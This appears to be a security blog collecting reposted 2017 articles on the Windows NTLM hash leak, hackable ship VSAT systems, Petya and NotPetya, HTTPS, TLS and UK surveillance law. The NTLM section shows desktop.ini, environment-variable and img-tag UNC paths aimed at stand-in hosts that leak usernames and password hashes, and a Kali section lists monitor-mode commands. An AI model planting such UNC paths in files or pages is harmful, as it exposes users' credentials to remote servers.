
NTLM Hash Leaks: Microsoft’s Ancient Design Flaw

https://dylankatz.com/NTLM-Hashes-Microsoft%27s-Ancient-Design-Flaw/

Your password hash has been leaking for 20 years

In March, I began experimenting with a technique used by Thinkst’s Canarytokens, which allowed them to ping a server when a folder was opened. Basically, they used a desktop.ini file to set the folder icon to an external network share. For instance, they would set the icon of the folder to \\ourwebsite.com\Something\icon.ico, and respond when that URL was pinged.
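A minimal sketch of the technique (the share and icon names are placeholders): a two-line desktop.ini points the folder's icon at a UNC path, and Explorer fetches it when the folder is rendered, pinging the remote server in the process.

```
[.ShellClassInfo]
IconResource=\\ourwebsite.com\Something\icon.ico,0
```

(For Explorer to honour desktop.ini, the containing folder usually also needs its read-only or system attribute set.)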

Discovery #1

After toying with this for a while, I noticed that environment variables could be used within these URLs, allowing for an information leak. By setting the URL to \\mysite.com\%USERNAME%, I was able to extract the current username from the system. In fact, I could extract any environment variable, such as %PATH% or %JAVA_HOME%.
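The expansion behaviour can be mimicked off-Windows with Python's ntpath.expandvars, which implements the same %VAR% substitution rules Windows applies to these paths (mysite.com and the alice value are stand-ins):

```python
import ntpath  # Windows path semantics, usable on any platform
import os

# The icon path as it would be written into desktop.ini or a .lnk file.
icon_path = r"\\mysite.com\%USERNAME%"

# Windows substitutes %USERNAME% before issuing the network request,
# so the attacker's server sees the value inside the requested path.
os.environ["USERNAME"] = "alice"      # stand-in for the victim's real username
print(ntpath.expandvars(icon_path))   # \\mysite.com\alice
```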

Discovery #2

Unfortunately, this still required the user to open a folder to leak information, which in my mind wasn’t enough to be dangerous. So, after a lot of experimentation, I was also able to get the exploit working via the icons of .lnk files, allowing it to be triggered from flash drives. At this point, I felt it was worthwhile to report this to Microsoft, but Microsoft did not feel it leaked enough information to be relevant. It wasn’t until several weeks later that I reopened the conversation.

Discovery #3

While browsing Reddit, as I so often do, I stumbled upon an interesting post with a familiar theme. This post by Bosko Stankovic introduced me to the wonders of NTLM hashes. Not only does rendering a filesystem icon cause a hashed version of the user’s password to be sent over the network; rendering ANY image using the \\ UNC prefix will do the same. This brings us to the meat of the problem. After researching further, I realized that this bug was first reported to Microsoft in 1997, making it older than I am. Microsoft has intentionally left it unfixed because of the structural changes a fix would require. Keep in mind this bug was originally introduced in WinNT/Win95. I can’t see how a fix wasn’t included in the massive restructuring that seems to occur during the countless major version updates since then.
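The core problem can be illustrated with a single line of HTML (attacker.example is a placeholder host). When Internet Explorer or an Office document renders it, Windows may open an SMB connection to the remote host and automatically attempt NTLM authentication, leaking the hash in the handshake:

```
<!-- Rendering this image triggers an outbound SMB connection,
     and with it an automatic NTLM authentication attempt. -->
<img src="\\attacker.example\share\pixel.png">
```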

Microsoft’s Stance/Recommendations

It took Microsoft a long time to respond to this issue. It wasn’t until 2009, roughly 12 years after the exploit was initially reported, that they decided to implement a workaround. Enter NTLM Blocking. Microsoft made it very clear that they strongly recommended against disabling NTLM outright, due to incompatibility issues. Instead, they created a system called NTLM Blocking, which requires users to edit their Windows security policies, track event logs, and whitelist applications that need access. This system, while effective if used correctly, is very complicated for normal users to configure and difficult to understand.
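For reference, the relevant settings live under Local Security Policy (the server names below are placeholder whitelist entries). A cautious rollout audits first, then denies:

```
Security Settings → Local Policies → Security Options

  Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers
      Audit all  – log NTLM use first, to see what would break
      Deny all   – block it once legitimate uses are whitelisted

  Network security: Restrict NTLM: Add remote server exceptions
  for NTLM authentication
      fileserver01, legacy-app.internal   – placeholder exceptions
```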

It’s not all terrible

Thankfully for Windows users, ISPs are defending them where their OS has failed to with a rather nuclear option. Microsoft maintains a list of ISPs that block port 445. This, combined with the fact that some modems will block outbound traffic on port 445, has prevented this issue from being as widely exploitable over the internet. However, even when this attack is blocked over the internet, it is very rarely blocked over LAN, meaning it could be used as a method of pivoting within networks. This issue highlights a serious problem with Microsoft’s inability to restructure core systems within Windows.
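Where neither the ISP nor the modem filters the traffic, a host-level firewall rule achieves a similar effect. On Windows, a rule like the following (the rule name is arbitrary) blocks the outbound SMB connections these attacks depend on:

```
netsh advfirewall firewall add rule name="Block outbound SMB" ^
    dir=out action=block protocol=TCP remoteport=445
```

Note this also breaks legitimate access to remote file shares, so it suits roaming laptops better than domain-joined desktops.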

The fact that simply opening an email or a webpage can compromise you or your organization, even on a fully patched system, should be a priority fix for Microsoft, but sadly it seems they are too big to move efficiently on this front. The case manager told me that a refactor of NTLM handling had been ongoing internally for some time; however, I’ve seen nothing to verify this.

Welp, even ships are hackable now

Large shipping vessels and aircraft are often equipped with VSAT systems, allowing crewmembers to send and receive messages and access the Internet during voyages. Turns out, some of these VSAT systems are profoundly insecure, and could allow an attacker to gain access, and disrupt communications.

Security researcher x0rz discovered that many VSAT systems can be reached from the public Internet. Not only does this mean they can be tracked through services like Shodan, but some are configured in a way that could see a remote attacker gain access using default credentials.

 

Duuuuuude, default creds everywhere. I’m connected to a motherfucking ship as admin right now. Hacking ships is easy 😏 pic.twitter.com/UmLPIveTah

— x0rz (@x0rz) July 18, 2017

 

TNW spoke to x0rz over the messaging app Signal. At the start of the interview, he wrote that “no ships were harmed during [his] experiments.” However, anyone with fewer scruples could have caused significant harm. The system they obtained access to allowed them to review the call history from the VSAT phone, change the system settings, and even upload new firmware.

 

They also noted that the VSAT system “might be connected to other onboard devices — maybe more critical,” noting that theoretically, you could exploit a VSAT system to get inside a network, in order to cause more damage.

Because these systems are publicly accessible, it’s possible to pinpoint where ships are with troubling precision. During the interview, x0rz gave me the latitude and longitude of a vessel he concluded was Russian, based on the language used in the system and its IP address. John Matherly, founder of Shodan, has also created a map where you can track vessels in real time.

x0rz has only identified a few vulnerable VSAT systems so far. These are all from the British manufacturer Cobham (although they note that other systems may ship with the same flaw) and are configured to expose HTTP web services to the Internet; others exposed only SNMP or UDP.

As pointed out by x0rz, VSAT systems are also popular on aircraft, ranging from small private jets, to military and passenger aircraft.

While it’s theoretically possible that there’s an aircraft equipped with an insecure VSAT system, x0rz noted that they hadn’t found any.

According to Thane & Thane, a Danish shipping company, the VSAT system is used to calibrate instruments. Any disruption could have disastrous consequences.

 

Reference:

https://thenextweb.com/insider/2017/07/18/welp-even-ships-are-hackable-now/

Can anyone become a programmer?

Just as few people can become full-time rock stars, only a small number of computing students will become full-time programmers; in fact, between 30% and 60% will fail their first programming module. However, a student could be mediocre at programming yet strong in networking. It’s like comparing an opera singer to a pop singer: they’re both singers, but with totally different characteristics, and both can make a living.

There are two distinct categories of students within computer science: those who find programming easy and those who find it virtually impossible. This issue is global, not just a problem for the UK. Success in programming cannot be predicted by sex or age. I find the research on programming both petrifying and electrifying, and there is no answer to the puzzle.

What can I add to the research regarding programming?  The first programming language that I was “taught” was Java.  It was an abysmal failure.  The college had to lower the pass mark from 40% to 37% as so many students had failed.  I have since learnt that Java is probably one of the worst languages to teach a novice.  I wholeheartedly agree with that research finding, as I have experienced it first hand.

Secondly, at university I noticed two largely mutually exclusive sets of computing students: those who were great at programming generally struggled with networking, while those who excelled at networking did not “get” programming.

Issues with programming:

  1. Working visual blueprints of programming concepts. A student needs appropriate mental models of what is happening within a program. For the majority, these blueprints do not yet exist. This inability to “see” what the program does means many students cannot predict what the output will be; if they cannot visualise what needs to happen, they cannot code it.
  2. Decomposition. We could argue that decomposition, or breaking an action into mini steps, is the first skill that needs to be taught. Students who can easily decompose an action into steps show a positive indicator of success.
  3. Language. A step forward is to teach Python rather than Java as a first language, but this alone is not the solution: even with Python, high failure rates predominate.
  4. Cognitive conflict. Many students suffer cognitive conflict, as coding is not a skill that everyone can acquire. If you’re tone deaf, no amount of singing will make you a pop star. Try explaining that concept to the policy makers.
  5. It’s estimated that half of novices build a mental map of the program and the other half do not. Those novices with a mental map score around 84%; those without average 48%.
  6. A programming background is not a positive indicator of success – someone who has read Classics could succeed in coding just as easily.

The hidden factor within this story is that the number of students studying computer science at university has halved, at a time when we need to double the number of graduates. So promoting a subject with high failure rates to children needs careful consideration.

However, as politicians have a profound lack of understanding of technology, the argument will fall on deaf ears… (see what I did there).

 

Reference:

https://arstechnica.com/information-technology/2012/09/is-it-true-that-not-everyone-can-be-a-programmer/

http://www.eis.mdx.ac.uk/research/PhDArea/saeed/paper1.pdf

http://www.eis.mdx.ac.uk/research/PhDArea/saeed/

Life is about to get harder for websites without https

In case you haven’t noticed, we’re on a rapid march towards a “secure by default” web when it comes to protecting traffic. For example, back in Feb this year, 20% of the Alexa Top 1 Million sites were forcing the secure scheme:

HTTPS at 20%

These figures are from Scott Helme’s biannual report and we’re looking at a 5-month-old number here. I had a quiet chat with him while writing this piece and apparently that number is now at 28% of the Top 1 Million. Even more impressive is the rate at which it’s changing – the chart above shows that it’s up 45% in only 6 months!

Perhaps even more impressive again is the near 60% of web requests Mozilla is seeing that are sent securely:

Percentage of Web Pages Loaded by Firefox Using HTTPS

Now that’s inevitably a lot of requests centred around the big players on the web who are doing HTTPS ubiquitously (think Gmail, Facebook, Twitter), but the trend is clear – HTTPS is being adopted at a fierce rate. Back in Jan I wrote about how we’d already reached the tipping point, in part because of browser measures like this:

The “shaming” of websites serving login or payment forms insecurely began with Chrome in January then Firefox shortly afterwards (occasionally with rather humorous consequences). And it worked too – soon after that tweet, Qantas did indeed properly secure their site. The indignity of visitors being told that a site is insecure inevitably helps force the hand of the site operator and HTTPS follows.

But per the title of this post, life is about to get a whole lot harder for sites that aren’t already doing HTTPS across the board. Here’s what you’re going to see in only a few months’ time:

Let’s dissect what’s going on here: at the time of writing we’re at Chrome 59, which behaves the same as Chrome 58 in the image above, so non-secure sites have no visual indicator suggesting this (at least not unless they contain a login or payment form). However, once we hit version 62, all websites with form fields served over HTTP will show a “Not secure” warning to the user. Think about what that means – for example, this site will start to show a warning:
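Even a page as innocuous as this triggers the warning from Chrome 62 onward, provided it is served over http:// rather than https:// (the form below is a hypothetical example):

```
<!-- Served over http://, this search box alone is enough
     to make Chrome 62 display "Not secure" in the address bar. -->
<form action="/search">
  <input type="text" name="q" placeholder="Search...">
</form>
```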

 

Reference

https://www.troyhunt.com/life-is-about-to-get-harder-for-websites-without-https/

Master Decrypt Key for Petya Ransomware released by creator

The master key for the original version of the Petya ransomware has been released by its creator, allowing Petya-infected victims to recover their encrypted files without paying any ransom money.

But wait, Petya is not NotPetya.

Do not confuse Petya ransomware with the latest destructive NotPetya ransomware (also known as ExPetr and Eternal Petya) attacks that wreaked havoc across the world last month, massively targeting multiple entities in Ukraine and parts of Europe.

The Petya ransomware has three variants that have infected many systems around the world, but now the author of the original malware, who goes by the pseudonym Janus, has made the master key available, publishing it on Wednesday.

According to security researchers, victims infected with previous variants of Petya ransomware, including Red Petya (first version), Green Petya (second version) and early versions of the GoldenEye ransomware, can get their encrypted files back using the master key.

The authenticity of the master key has been verified by an independent Polish information security researcher known as Hasherezade.

“Similarly to the authors of TeslaCrypt, he released his private key, allowing all the victims of the previous Petya attacks, to get their files back,” Hasherezade posted her finding on MalwareBytes on Thursday.

“Thanks to the currently published master key, all the people who have preserved the images of the disks encrypted by the relevant versions of Petya, may get a chance of getting their data back.”

Although the first and second versions of Petya were cracked last year, the private key released by Janus offers the fastest and most reliable way yet for Petya-infected victims to decrypt their files, especially those locked with the previously uncrackable third version.

Meanwhile, Kaspersky Lab research analyst Anton Ivanov also analyzed the Janus’ master key and confirmed that the key unlocks all versions of Petya ransomware, including GoldenEye.

Janus created the GoldenEye ransomware in 2016 and sold the variants as Ransomware-as-a-Service (RaaS) to other hackers, allowing anyone to launch ransomware attacks with just one click, encrypting systems and demanding a ransom to unlock them.

If the victim pays, Janus gets a cut of the payment. But in December, he went silent.

However, according to the Petya author, his malware has been modified by another threat actor to create NotPetya that targeted computers of critical infrastructure and corporations in Ukraine as well as 64 other countries.

The NotPetya ransomware also makes use of the NSA’s leaked Windows hacking exploits EternalBlue and EternalRomance to rapidly spread within a network, and the WMIC and PsExec tools to remotely execute malware on machines.

Security experts even believe the real intention behind the recent ransomware outbreak, which was believed to be bigger than WannaCry, was to cause disruption, rather than just another ransomware attack.

According to researchers, NotPetya is in reality wiper malware that wipes systems outright, destroying all records from the targeted systems, and asking for ransom was just to divert world’s attention from a state-sponsored attack to a malware outbreak.

The master key won’t help those infected with NotPetya, but it can help people who were attacked by previous variants of Petya and GoldenEye ransomware in the past.

Security researchers are using the key to build free decryptors for victims who still have crypto-locked hard drives.

Reference:

https://thehackernews.com/2017/07/petya-ransomware-decryption-key.html

New attack can now decrypt satellite phone calls in “real time”

Chinese researchers have discovered a way to rapidly decrypt satellite phone communications — within a fraction of a second in some cases.

The paper, published this week, expands on previous research by German academics in 2012 by rapidly speeding up the attack and showing that the encryption used in popular Inmarsat satellite phones can be cracked in “real time.”

 

Satellite phones are used by those in desolate environments, including high altitudes and at sea, where traditional cell service isn’t available. Modern satellite phones encrypt voice traffic to prevent eavesdropping. It’s that modern GMR-2 algorithm that was the focus of the research, given that it’s used in most satellite phones today.

The researchers tried “to reverse the encryption procedure to deduce the encryption-key from the output keystream directly,” rather than using the German researchers’ method of recovering an encryption key using a known-plaintext attack.

Using their proposed inversion attack thousands of times on a 3.3GHz satellite stream, the researchers were able to reduce the search space for the 64-bit encryption key, making the decryption key far easier to find.

The end result was that encrypted data could be cracked in a fraction of a second.
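To get a feel for why shrinking the search space is decisive, compare exhaustive-search times at an assumed guess rate (the 10^9 keys/second figure and the reduced space size below are illustrative assumptions, not numbers from the paper):

```python
GUESSES_PER_SECOND = 10**9  # assumed attacker hardware, for illustration

# Searching the full 64-bit GMR-2 key space at that rate:
full_space_seconds = 2**64 / GUESSES_PER_SECOND
print(f"full 64-bit search: ~{full_space_seconds / (3600 * 24 * 365):.0f} years")

# If an inversion attack narrows the candidates to, say, 2**13 keys:
reduced_seconds = 2**13 / GUESSES_PER_SECOND
print(f"reduced search: ~{reduced_seconds * 1e6:.0f} microseconds")
```

Hundreds of years collapse into microseconds, which is how "real time" decryption becomes possible.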

 

“This again demonstrates that there exists serious security flaws in the GMR-2 cipher, and it is crucial for service providers to upgrade the cryptographic modules of the system in order to provide confidential communication,” said the researchers.

An Inmarsat spokesperson said Thursday that the company “immediately took action to address the potential security issue and this was fully addressed” in 2012. “We are entirely confident that the issue… has been completely resolved and that our satellite phones are secure,” the spokesperson said.

Matthew Green, a cryptography teacher at Johns Hopkins University, blogged about the German read-collision based technique in 2012. “Satellite telephone security matters,” he said at the time. “In many underdeveloped rural areas, it’s the primary means of communicating with the outside world. Satphone coverage is also important in war zones, where signal privacy is of more than academic interest,” he added.

 

Reference:

http://www.zdnet.com/article/encryption-satellite-phones-unscramble-attack-research/

TLS security: Past, present and future

https://www.helpnetsecurity.com/2017/07/03/tls-security/

The Transport Layer Security (TLS) protocol as it stands today has evolved from the Secure Sockets Layer (SSL) protocol from Netscape Communications and the Private Communication Technology (PCT) protocol from Microsoft that were developed in the 1990s, mainly to secure credit card transactions over the Internet.

It soon became clear that a unified standard was required, and the IETF chartered a TLS working group. As a result, TLS 1.0 was specified in 1999, TLS 1.1 in 2006, TLS 1.2 in 2008, and TLS 1.3 will hopefully be released soon. Each protocol version tried to improve on its predecessor and mitigated some specific attacks.

 

As is usually the case in security, there is a “cops and robbers” game going on between the designers and developers of the TLS protocol and the people who try to break it (be it from the hacker community or from academia). Unfortunately, this game is open-ended: it will never end and has no winner.

Since the early days of the SSL/TLS protocols, the security community has been struggling with various attacks that have made many press headlines. Examples include protocol-level attacks, like BEAST, CRIME, TIME, BREACH, Lucky 13, POODLE, FREAK, Logjam, DROWN, SLOTH, Sweet32, and the triple handshake attack, as well as pure implementation bugs, like Apple’s “goto fail” and Heartbleed.

In the evolution of the SSL/TLS protocols, all of these attacks and incidents were considered. For example, the weaknesses and vulnerabilities that enabled attacks like BEAST, POODLE, and Lucky 13, led to TLS 1.1. All remaining weaknesses and vulnerabilities have been taken into account in the specification of TLS 1.3 (the protocol version may still change, because the protocol changes are fundamental and substantial).

From a security perspective, TLS 1.3 is a major breakthrough and tries to get rid of all cryptographic techniques and primitives that are known to be weak and exploitable. For example, ciphers are only allowed in TLS 1.3 if they provide authenticated encryption with associated data (AEAD). Most importantly, this disallows all block ciphers operated in cipher block chaining (CBC) mode, which has been the source of many attacks in the past. It also disallows the formerly used technique of first authenticating data (by generating a message authentication code) and then encrypting it. Instead, both operations must be performed as a single operation.
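The structural difference can be sketched with a toy AEAD-style seal/open pair. This is NOT real cryptography (TLS 1.3 actually uses AES-GCM or ChaCha20-Poly1305); the point is only the interface: one call both encrypts and authenticates, covering the associated data, and decryption fails closed if anything was tampered with.

```python
import hashlib
import hmac

def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    # Toy counter-mode keystream derived from SHA-256 (illustration only).
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return out[:n]

def seal(key: bytes, nonce: bytes, plaintext: bytes, aad: bytes) -> bytes:
    # Encrypt and authenticate in one operation; the tag covers the AAD too.
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + aad + ct, hashlib.sha256).digest()
    return ct + tag

def open_(key: bytes, nonce: bytes, sealed: bytes, aad: bytes) -> bytes:
    # Verify before decrypting; tampering raises instead of returning junk.
    ct, tag = sealed[:-32], sealed[-32:]
    expected = hmac.new(key, nonce + aad + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))
```

Contrast this with the old MAC-then-encrypt construction, whose separate steps opened the door to padding-oracle attacks like Lucky 13.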

TLS 1.3 also disallows cryptographic algorithms that are known to be weak, such as stream ciphers like RC4, hash functions like MD5 and SHA-1, and block ciphers like 3DES, as well as all types of export-grade cryptography. Due to attacks like CRIME, TIME, and BREACH, we know today that securely combining compression and encryption is tricky, and TLS 1.3 therefore abandons TLS-level compression entirely. Finally, TLS 1.3 reworks session resumption and drops renegotiation; these shortcut features have led to distinct attacks in the past, e.g., the session renegotiation and triple handshake attacks.
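In practice, Python's ssl module already reflects most of this hardening. A short sketch of a client context that refuses the deprecated pieces (recent Python defaults are already close to this):

```python
import ssl

ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse SSLv3 and TLS 1.0/1.1
ctx.options |= ssl.OP_NO_COMPRESSION          # CRIME-style attacks need compression

# The default cipher list already excludes RC4, 3DES and MD5-based suites,
# and a TLS 1.3 connection will only ever negotiate AEAD suites.
print(ctx.minimum_version)
```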

 

The bottom line is that TLS 1.3 represents the state-of-the-art in cryptographic research. Does this mean that the series of attacks, countermeasures, and counterattacks will eventually come to an end, and that we are going to see a stable situation in terms of security? Probably not. Once again, the problem is in the difference between theory and practice. To put it into the words of Albert Einstein: “In theory, theory and practice are the same. In practice, they are not.” This quote is true, and it is certainly also true for TLS 1.3. In theory, TLS 1.3 is secure, but in practice, we don’t know.

There are at least two uncertainties: First, we don’t know how well the protocol is going to be implemented (keep in mind that in any nontrivial security protocol, implementation bugs are likely to occur). Second, the implementations of the protocol need to be configured and used in proper ways (keep in mind that security breaches often occur, because security products are misconfigured or misused).

This is similar to the real world: If we have a security system in place (e.g., a burglar alarm system), we can still misconfigure it or use it in a way that is inappropriate and makes its security obsolete.

Security is and remains to be a tricky and multifaceted business. There are many things that can go wrong. A mathematician would say that having secure technologies in place is a necessary but not sufficient condition to achieve security.

Many complementary things must be in place so that a technology can unfold its real power. This also applies to TLS security in general, and TLS 1.3 in particular. The most important example to mention here is a proper way to manage public key certificates on a global scale. This is still one of the Achilles heels in properly using TLS. You may stay tuned: The “cops and robbers” game is likely to continue and you may even participate in this challenging game.

 

What A Global Anti-Encryption Regime Could Look Like – UK

Our Prime Minister wrote the dangerous Investigatory Powers law, and this year, to my horror, she persists in attempting to end widespread encryption. I’m concerned that these laws are open to abuse by hundreds of government departments, in addition to enabling everyday financial crime. In truth, I am more worried by government abuse than by any crimes that may be committed by criminals.

https://www.eff.org/deeplinks/2017/06/five-eyes-unlimited

Before she was elevated to the role of Prime Minister by the fallout from Brexit, Theresa May was the author of the UK’s Investigatory Powers bill, which spelled out the UK’s plans for mass surveillance in a post-Snowden world.

At the unveiling of the bill in 2015, May’s officials performed the traditional dance: they stated that they would be looking at controls on encryption, and then stated definitively that their new proposals included “no backdoors”.

Sure enough, the word “encryption” does not appear in the Investigatory Powers Act (IPA). That’s because it is written so broadly it doesn’t need to.

We’ve covered the IPA before at EFF, but it’s worth re-emphasizing some of the powers it grants the British government.

  • Any “communications service provider” can be served with a secret warrant, signed by the Home Secretary. Communications service provider is interpreted extremely broadly to include ISPs, social media platforms, mail services and other messaging services.
  • That warrant can describe a set of people or organizations that the government wants to spy upon.
  • It can require tech companies to insert malware onto their users’ computers, re-engineer their own technology, or use their networks to interfere with any other system.
  • The warrant explicitly allows those companies to violate any other laws in complying with the warrant.
  • Beyond particular warrants, private tech companies operating in the United Kingdom also have to respond to “technical capability notices” which will require them to “To provide and maintain the capability to disclose, where practicable, the content of communications or secondary data in an intelligible form,” as well as permit targeted and mass surveillance and government hacking.
  • Tech companies also have to provide the UK government with new product designs in advance, so that the government has time to require new “technical capabilities” before the products are available to customers.

These capabilities alone already go far beyond the Nineties’ dreams of a blanket ban on crypto. Under the IPA, the UK claims the theoretical ability to order a company like Apple or Facebook to remove secure communication features from their products—while being simultaneously prohibited from telling the public about it.

Companies could be prohibited from fixing existing vulnerabilities, or required to introduce new ones in forthcoming products. Even incidental providers of communication tech could be commandeered to become spies in Her Majesty’s Secret Service: those same powers also allow the UK to, say, instruct a chain of coffee shops to use its free WiFi service to deploy British malware on its customers. (And, yes, coffee shops are given by officials as a valid example of a “communications service provider.”)

Wouldn’t companies push back against such demands? Possibly: but it’s a much harder fight to win if it’s not just the UK making the demand, but an international coalition of governments putting pressure on them to obey the same powers. This, it seems, is what May’s government wants next.

The Lowest Common Privacy Denominator

Since the IPA passed, May has repeatedly declared her intent to create an international agreement on “regulating cyberspace”. The difficulty of enforcing many of the theoretical powers of the IPA makes this particularly pressing.

The IPA includes language that makes it clear that the UK expects foreign companies to comply with its secret warrants. Realistically, it’s far harder for UK law enforcement to get non-UK technology companies to act as their personal hacking teams. That’s one reason why May’s government has talked up the IPA as a “global gold standard” for surveillance, and one that they hope other countries will adopt.

 

 

Cyber attack hits CHERNOBYL radiation system: ‘Goldeneye’ ransomware strikes

http://www.dailymail.co.uk/news/article-4643752/Europe-hit-new-WannaCry-virus.html

Chernobyl’s radiation monitoring system has been hit by the attack, with its sensors shut down, while UK advertising giant WPP, the largest agency in the world, is among dozens of firms affected.

The ransomware appears to have been spread through popular accounting software and specifically targeted at bringing down business IT systems.

The outage began in Ukraine as the country’s power grid, airport, national bank and communications firms were first to report problems, before it spread rapidly throughout Europe.

Companies in the US, Germany, Norway, Russia, Denmark and France are among those to have confirmed issues so far.

Users are being shown a message saying their data has been encrypted, with some asked for £300 in the anonymous digital currency Bitcoin to retrieve it (pictured, an ATM in Ukraine).

More than 200,000 victims in 150 countries were infected by last month’s WannaCry ransomware, which was first reported in the UK and Spain before spreading globally.

But cyber security experts have warned that this time the virus is much more dangerous, because it has no ‘kill switch’ and is designed to spread rapidly through networks.

Marcus Hutchins, who foiled the previous WannaCry attack by discovering a way to stop it from infecting new computers, told MailOnline that even if users pay the fee their files could now be lost forever.

He said: ‘The company that hosts the email account which the ransomware asks you to contact has closed the account. There’s no way to get files back.

‘It’s early days – we don’t know if we can find a fix yet. But if it’s decryptable we will find a way.’

Hutchins, 22, continued: ‘Everyone’s looking at this right now and I’m working with other researchers.

‘I was just praying it wasn’t the Wannacry exploit again. Ideally we’ll have to find a way to decrypt the files or else people are not going to get them back.’

The ransomware targets computers using the Windows XP operating system that have not installed the latest security updates released by Microsoft.

KALI Linux – Promiscuous Mode – Wireless Hacking

 

Six Modes of Wireless

  • Monitor
  • Managed
  • Ad hoc
  • Master
  • Mesh
  • Repeater
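On Kali, monitor mode (the wireless analogue of promiscuous mode) is what most packet-capture tools need. A common sequence, assuming the interface is named wlan0 and the driver supports monitor mode:

```
# put the interface into monitor mode with the ip/iw tools
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# or let aircrack-ng's helper do it (creates a monitor interface, e.g. wlan0mon)
airmon-ng start wlan0
```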
